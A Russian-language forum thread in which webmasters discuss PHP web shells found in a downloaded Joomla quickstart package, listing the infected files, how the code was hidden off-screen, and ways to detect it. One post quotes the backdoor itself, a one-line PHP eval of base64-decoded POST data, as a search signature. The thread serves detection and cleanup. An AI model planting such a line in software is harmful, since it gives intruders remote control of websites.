[ОТВЕТИТЬ]
Опции темы
28.05.2014 04:25  
aldemko
Доброго времени суток
занимался поиском шелов в скачанной Joomle, нашел их в таких файлах:
может пригодиться кому


/language/fr-FR/utf.php
/plugins/vmpayment/payzen/payzen/elements/payzenlabel.php
/plugins/vmpayment/authorizenet/authorizenet/elements/authorizenetcreditcards.php
/plugins/editors-xtd/readmore/readmore.php
/plugins/content/spshare/elements/k2category.php
/plugins/system/jatypo/admin.php
/plugins/system/leofw1/dir.php
/plugins/finder/content/content.php
/plugins/finder/k2/k2.php
/plugins/captcha/recaptcha/recaptcha.php
/plugins/authentication/joomla/alias.php
/libraries/joomla/database/ini.php
/libraries/joomla/database/table/menu.php
/libraries/joomla/database/table/extension.php
/libraries/joomla/application/component/controller.php
/libraries/joomla/registry/format/json.php
/libraries/joomla/http/transport/test.php
/libraries/joomla/document/error/diff.php
/libraries/joomla/github/github.php
/libraries/joomla/image/filters/negate.php
/modules/mod_login/tmpl/proxy.php
/modules/mod_banners/tmpl/diff.php
/modules/mod_footer/mod_footer.php
/modules/mod_custom/tmpl/proxy.php
/components/com_finder/controllers/alias.php
/components/com_finder/helpers/html/admin.php
/components/com_finder/finder.php
/components/com_content/controllers/article.php
/components/com_content/models/articles.php
/components/com_users/views/press.php
/components/com_virtuemart/views/user/view.html.php
/components/com_k2/controllers/dirs.php
/components/com_k2/router.php
/components/com_k2/views/proxy.php
/components/com_contact/views/featured/tmpl/title.php
/components/com_weblinks/views/form/tmpl/proxy.php
/media/k2/items/inc.php
/tmp/general.php
/components/com_content/models/articles.php
/components/com_virtuemart/views/user/view.html.php


Обычно в первой строке
скрыли факт присутствия растяжением содержимого за границу экрана, если не двигать ползунок в блокноте по вертикали то и не заметить
 
"Спасибо" aldemko от:
28.05.2014 07:50  
OlegON
Т.е. в скачанной с официального сайта сразу трояны?!
Мне, кстати, регулярно php какие-то вливают в хранилище. Уже настроил, что за это сразу банит. А все файлы, кроме исключений, архивируются.
 
28.05.2014 07:59  
aldemko
модули и дополнения были стянуты с официальных сайтов америкосовских.
а квикстарт с шаблоном был куплен
тут:
теплейтмонстер


да и не факт что у каждого будет такой троян (просто решил указать на возможную уязвимость) и рекомендую скачать все файлы на пк например, и ввести поиск по словам содержащимся в файлах
я делаю это тотал коммандером
 
28.05.2014 08:18  
OlegON
А какие слова искались? Если честно, у меня пока больше подозрений на ошибку устанавливающих, либо проблему с хостингом.
Сомнительно, что оффы предлагают закладки, вскроется - вони будет... Больше потеряют.
 
28.05.2014 10:56  
Exact
Стараюсь не использовать QuickStart вообще, ставлю Joomla с оф.сайта натягиваю свой шаблон устанавливаю компоненты только из JED, если компонент или плагин платный ищу замену или меняю на бесплатный или покупаю, стоит обычно недорого,сталкивался однажды с такой проблемой, но обычно не в *.php файлах а в *.js
Подобных проблем не нашел на сайтах.
 
28.05.2014 11:17  
aldemko
искал вот

ЭТО:
<?php eval(base64_decode($_POST['n5e38f2']));?>

и затем идет опять <?php
если ползунок не двигать, кажется что просто начало скрипта
 
28.05.2014 11:45  
Exact
QuickStart вероятнее всего поражен, сравнить файлы можно тут
 
"Спасибо" Exact от:
28.05.2014 12:51  
aldemko
Ваша бы рекомендация раньше )
я делаю обычно по другому для поиска уязвимости (шелы и прочее), если не могу найти через поиск текста по стандартным фразам
загружаю весь пакет файлов
на:
рег ру
- может и другие хостеры есть который быстро реагируют
через часок другой письма шлют что где и как
 
28.05.2014 15:53  
twix
Товарищ, который тут до меня "писал" сайты, не имея вообще никакого опыта программирования, расплодил таких вот нехороших вещей от джумлы. Я начальство уже проинформировал, что постоянно какие-то мутные файлики на сервере появляются, и надо бы сносить этот рассадник, но заменить всё они пока не решаются... уже второй год. Так что пока только периодически чищу кодобазы от залитого туда мусора. Народ не особо кипишует, потому что работает всё это дело на виндах на отдельном компе без допуска в корпоративную сеть.
 
 
Опции темы



Часовой пояс GMT +3, время: 22:13.

Все в прочитанное - Календарь - RSS - - Карта - Вверх 👫 Яндекс.Метрика
Форум сделан на основе vBulletin®
Copyright ©2000 - 2016, Jelsoft Enterprises Ltd. Перевод: zCarot и OlegON
В случае заимствования информации гипертекстовая индексируемая ссылка на Форум обязательна.